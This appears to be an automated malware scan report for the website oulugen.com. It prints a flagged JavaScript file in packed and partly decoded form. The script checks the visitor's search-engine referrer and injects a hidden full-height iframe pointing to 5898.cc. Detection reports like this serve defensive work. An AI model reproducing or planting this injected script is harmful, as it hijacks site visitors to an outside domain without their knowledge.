Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oulugen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://oulugen.com/ | 200 OK Content-Length: 10819 Content-Type: text/html | clean |
http://oulugen.com/js/tongji-oulugen.js | 200 OK Content-Length: 1089 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 5898.cc var tj = '<script src="https:\/\/s4.cnzz.com/stat.php?id=5926779&web_id=5926779" language="JavaScript"><\/script>';
var tj2 = '<script language="javascript" src="http:\/\/count4.51yes.com\/click.aspx?id=41320322&logo=1" charset="gb2312"><\/script>'; var Src = "http:\/\/5898.cc"; var Height = "3933px"; eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4 5="n%";3["2"]["9"](k);3["2"]["9"](m);4 8=2.f;4 7=8.j(/l=|i=|&t=|d|c\\ ...[382 bytes skipped]... Decoded script: var width="100%";window["document"]["writeln"](tj);window["document"]["writeln"](tj2);var fromUrl=document.referrer;var bai=fromUrl.match(/wd=|psid=|&t=|tinyurl|is\.gd|query=|q=/g);if(bai!=null){var divObj=window["document"]["createElement"]("iframe");divObj.style.height=Height;divObj.style.width=width;divObj.src=Src;divObj.scrolling='no';divObj.frameborder='0';var first=window["document"]["body"]["firstChild"];window["document"]["body"][" ...[517 bytes skipped]... | ||
http://oulugen.com/list/index/ | 200 OK Content-Length: 7149 Content-Type: text/html | clean |
http://oulugen.com/list/images/ | 200 OK Content-Length: 6733 Content-Type: text/html | clean |
http://oulugen.com/list/down/ | 200 OK Content-Length: 7249 Content-Type: text/html | clean |
http://oulugen.com/list/video/ | 200 OK Content-Length: 7241 Content-Type: text/html | clean |
http://oulugen.com/topic/%E6%AC%A7%E6%B4%B2%E5%A8%B1%E4%B9%90%E7%BD%91%E7%AB%99 | 200 OK Content-Length: 5366 Content-Type: text/html | clean |
http://oulugen.com/single/about.html | 200 OK Content-Length: 3587 Content-Type: text/html | clean |
http://oulugen.com/test404page.js | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
http://oulugen.com/../ | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
http://oulugen.com/ouzhouyulewangzhan-410.htm | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
http://oulugen.com/ouzhouyulewangzhan-359.htm | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
http://oulugen.com/ouzhouyulewangzhan-358.htm | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
http://oulugen.com/ouzhouyulewangzhan-338.htm | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
http://oulugen.com/ouzhouyulewangzhan-335.htm | 404 Not Found Content-Length: 1119 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oulugen.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 03:20:39 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fvi7oadlcrhnmhfh88e1ogf4r1; path=/
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: oulugen.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 03:20:39 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fvi7oadlcrhnmhfh88e1ogf4r1; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: oulugen.com
Referer: http://www.google.com/search?q=oulugen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oulugen.com
Referer: http://www.google.com/search?q=oulugen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.